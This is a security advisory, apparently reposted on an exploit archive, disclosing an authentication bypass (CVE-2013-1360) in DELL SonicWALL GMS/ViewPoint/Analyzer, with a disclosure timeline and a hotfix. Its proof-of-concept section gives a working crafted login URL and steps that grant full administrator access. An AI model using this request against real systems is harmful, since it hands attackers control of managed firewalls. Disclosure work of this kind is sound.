what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass

DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass
Posted Jan 18, 2013
Authored by Nikolas Sotiriu

SonicWALL GMS/Viewpoint/Analyzer suffers from an authentication bypass vulnerability.

tags | exploit, bypass
advisories | CVE-2013-1360
SHA-256 | a7cdf9ef5dde0b877ce946cd1289e5066843249e2b56404241fd4a4fba9a3e72

DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass

Change Mirror Download
______________________________________________________________________
-------------------------- NSOADV-2013-002 ---------------------------

SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/)
______________________________________________________________________
______________________________________________________________________

111101111
11111 00110 00110001111
111111 01 01 1 11111011111111
11111 0 11 01 0 11 1 1 111011001
11111111101 1 11 0110111 1 1111101111
1001 0 1 10 11 0 10 11 1111111 1 111 111001
111111111 0 10 1111 0 11 11 111111111 1 1101 10
00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100
10111111 0 01 0 1 1 111110 11 1111111111111 11110000011
0111111110 0110 1110 1 0 11101111111111111011 11100 00
01111 0 10 1110 1 011111 1 111111111111111111111101 01
01110 0 10 111110 110 0 11101111111111111111101111101
111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111
111110110 10 0111110 1 0 0 1111111111111111111111111 110
111 11111 1 1 111 1 10011 101111111111011111111 0 1100
111 10 110 101011110010 11111111111111111111111 11 0011100
11 10 001100 0001 111111111111111111 10 11 11110
11110 00100 00001 10 1 1111 101010001 11111111
11101 0 1011 10000 00100 11100 00001101 0
0110 111011011 0110 10001 101 11110
1011 1 10 101 000001 01 00
1010 1 11001 1 1 101 10
110101011 0 101 11110
110000011
111
______________________________________________________________________
______________________________________________________________________

Title: SonicWALL GMS/Viewpoint/Analyzer
Authentication Bypass (/sgms/)
Severity: Critical
CVE-ID: CVE-2013-1360
CVSS Base Score: 9
Impact: 8.5
Exploitability: 10
CVSS2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:C
Advisory ID: NSOADV-2013-002
Found Date: 2012-04-26
Date Reported: 2012-12-13
Release Date: 2013-01-17
Author: Nikolas Sotiriu
Website: http://sotiriu.de
Twitter: http://twitter.com/nsoresearch
Mail: nso-research at sotiriu.de
URL: http://sotiriu.de/adv/NSOADV-2013-002.txt
Vendor: DELL SonicWALL (http://www.sonicwall.com/)
Affected Products: GMS
Analyzer
UMA
ViewPoint
Affected Platforms: Windows/Linux
Affected Versions: GMS/Analyzer/UMA 7.0.x
GMS/ViewPoint/UMA 6.0.x
GMS/ViewPoint/UMA 5.1.x
GMS/ViewPoint 5.0.x
GMS/ViewPoint 4.1.x
Remote Exploitable: Yes
Local Exploitable: No
Patch Status: Vendor released a patch (See Solution)
Discovered by: Nikolas Sotiriu



Background:
===========

The SonicWALL® Global Management System (GMS) provides organizations,
distributed enterprises and service providers with a powerful and
intuitive solution to centrally manage and rapidly deploy SonicWALL
firewall, anti-spam, backup and recovery, and secure remote access
solutions. Flexibly deployed as software, hardware, or a virtual
appliance, SonicWALL GMS offers centralized real-time monitoring, and
comprehensive policy and compliance reporting. For enterprise customers,
SonicWALL GMS streamlines security policy management and appliance
deployment, minimizing administration overhead. Service Providers can
use GMS to simplify the security management of multiple clients and
create additional revenue opportunities. For added redundancy and
scalability, GMS can be deployed in a cluster configuration.

(Product description from Website)



Description:
============

DELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that
allows an unauthenticated, remote attacker to bypass the Web interface
authentication offered by the affected product.

The vulnerability is attributed to a broken session handling in the
process of password change process of the web application.
changing in the web application.

An attacker may exploit this vulnerability by sending a specially
crafted request to the SGMS Interface (/sgms/).

The attacker gains full administrative access to the interface and
full control over all managed appliances, which could lead to a full
compromisation of the organisation.



Proof of Concept :
==================

Access the following URL to login to the sgms interface:

http://host/sgms/auth?clientHash=765c5e5b571050030b63666663383064663
83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092
4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000
00000000001

If the Console is not directly shown, type any password you
want in the change password dialog twice and hit submit to login.

Maybe you need to access the following URL after this process:

http://host/sgms/auth



Solution:
=========

Install Hotfix 125076.77. (Download from www.mysonicwall.com)



Disclosure Timeline:
====================

2012-04-26: Vulnerability found
2012-12-12: Sent the notification and disclosure policy and asked
for a PGP Key (security@sonicwall.com)
2012-12-13: Sent advisory, disclosure policy and planned disclosure
date (2012-12-28) to vendor
2012-12-18: SonicWALL analyzed the finding and wishes to delay the
release to the 3. calendar week 2013.
2012-12-18: Changed release date to 2013-01-17.
2012-12-20: Patch is published
2013-01-17: Release of this advisory




Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close